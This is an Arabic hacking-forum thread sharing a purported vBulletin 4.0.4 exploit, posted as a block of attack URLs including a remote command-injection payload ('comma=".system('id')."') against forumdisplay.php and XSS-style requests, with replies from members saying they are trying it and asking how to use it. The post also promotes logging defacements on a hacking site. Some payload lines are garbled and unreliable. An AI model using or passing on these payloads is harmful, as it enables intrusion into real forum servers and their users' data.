ثغرات خطيره في منتديات vbulletin 4.0.4

ثغرات خطيره في منتديات vbulletin 4.0.4


النتائج 1 إلى 9 من 9

الموضوع: ثغرات خطيره في منتديات vbulletin 4.0.4

  1. #1

    Ham ثغرات خطيره في منتديات vbulletin 4.0.4

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

    الثغره بسيطه جدا
    رابط الثغره
    http://www.exploit-db.com/exploits/14686/

    كود PHP:
    /*======================================================================*\
    || #################################################################### ||
    || # Vurnerebility vBulletin - http://www.vbulletin.org               # ||
    || # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
    || # Version license 4.0.4                          # ||
    || # info set cookies, error issue & critical-information-disclosure  # ||
    || # Dork powered by vBulletin 4.0.4                      # ||
    || # author mc2_s3lector                          # ||
    || # Contact|http://www.yogyacarderlink.web.id                  # ||
    || #################################################################### ||
    \*======================================================================*/
                             
    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

    http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

    /*======================================================================*\
    |# #####################################################################  |
     # gretz: all family(www.yogyacarderlink.web.id)            # |             
    |# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,    # |
    |# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r,    # |
    |# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all              # |
    |# KeDaiComputerworks.org                        # |
    |# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |                              
    |# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com    # | 
    |  #####################################################################  |
    \*======================================================================*/ 
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2

    افتراضي رد: ثغرة خطيره في منتديات vbulletin 4.0.4

    مشكور جاري التجريب

  3. #3

    افتراضي رد: ثغرة خطيره في منتديات vbulletin 4.0.4

    مشكوووور يا أستاذ ووواصل

  4. #4
    هكر مجتهد الصورة الرمزية darts
    تاريخ التسجيل
    Jan 2010
    الدولة
    ببلاد الله الواسعة
    المشاركات
    330

    افتراضي رد: ثغرة خطيره في منتديات vbulletin 4.0.4

    ما فهمت شي ؟؟
    كن في الحياة كعابر سبيل ... واترك ورائك كل اثر جميل... فما نحن في الحياة الا ضيوف ... وما على الضيوف الا الرحيل !


    شباب انا دخولي بل نت قليل لانو عم سافر بل بحر .......... دعولي

  5. #5

    افتراضي رد: ثغرة خطيره في منتديات vbulletin 4.0.4

    شكرا جزيلا على الثغرات
    الإستغلال هو
    والثغرات من نوقع Remote Command Excute و XSS
    وهذه 3 ثغرات وليست ثغرة واحدة

    بالتوفيق
    الرجاء عدم المراسلة إلا للضرورة،
    اذا كان هنالك سؤال فيتم وضعه في قسم الاستفسارات بعد مراجعة قوانين القسم
    وطلبات الإختراق مرفوضة مسبقا.

  6. #6

    افتراضي رد: ثغرات خطيره في منتديات vbulletin 4.0.4

    تسلم يا غالي

  7. #7

    افتراضي رد: ثغرات خطيره في منتديات vbulletin 4.0.4

    طيب ممكن تشرح نعمل إيه بالإستغلال..؟
    يعنى الرابط دا مثلا
    http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    نعمل فيه إيه بالظبط
    إيه كلمة patch
    نحط مكانها إيه.؟
    وفى حاجه تاني هنغيرها ولا أسم الموقع (الدومين)+patch وبس..؟
    والثغره فايدتها إيه
    وألف شكر مقدما
    فلنسعى لتكوين أحلى جيش يدافع عن الشريعه الإسلاميه وعن المظلومين..
    تم تغير الإيميل
    b_1_d@9.cn

    http://im2.gulfup.com/2011-03-30/1301481146491.gif

  8. #8
    هكر مجتهد الصورة الرمزية Dr.a7
    تاريخ التسجيل
    Jun 2010
    الدولة
    المدينه المنوره
    المشاركات
    368

    افتراضي رد: ثغرات خطيره في منتديات vbulletin 4.0.4

    مشكوووور يعطيك العافيه على الثغره جاري التجربه

  9. #9
    هكر مبتديء الصورة الرمزية Murad
    تاريخ التسجيل
    Sep 2010
    الدولة
    الاردن..~
    المشاركات
    3

    افتراضي رد: ثغرات خطيره في منتديات vbulletin 4.0.4

    ارجو الشرح لكيفية الاستغلال
    وشكراا لك اخي

المواضيع المتشابهه

  1. كتاب إختراق منتديات vBulletin
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق المنتديات
    مشاركات: 103
    آخر مشاركة: 06-13-2012, 05:53 PM
  2. 110 شرح بل فديو اختراق منتديات السيرفر vBulletin عن طريق سكربت Symlink والتطبيق
    بواسطة المكار في المنتدى منتدى إختراق المنتديات
    مشاركات: 58
    آخر مشاركة: 05-18-2011, 05:30 PM
  3. ثغرات منتديات vb 3.6.8
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 39
    آخر مشاركة: 09-23-2010, 11:49 AM
  4. الله يحفظكم شباب اريد مجموعة من ثغرات منتديات duhok forum
    بواسطة the big hacker في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 05-29-2010, 03:29 PM
  5. الله يحفظكم شباب اريد مجموعة من ثغرات منتديات duhok forum
    بواسطة the big hacker في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 01-29-2010, 02:25 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •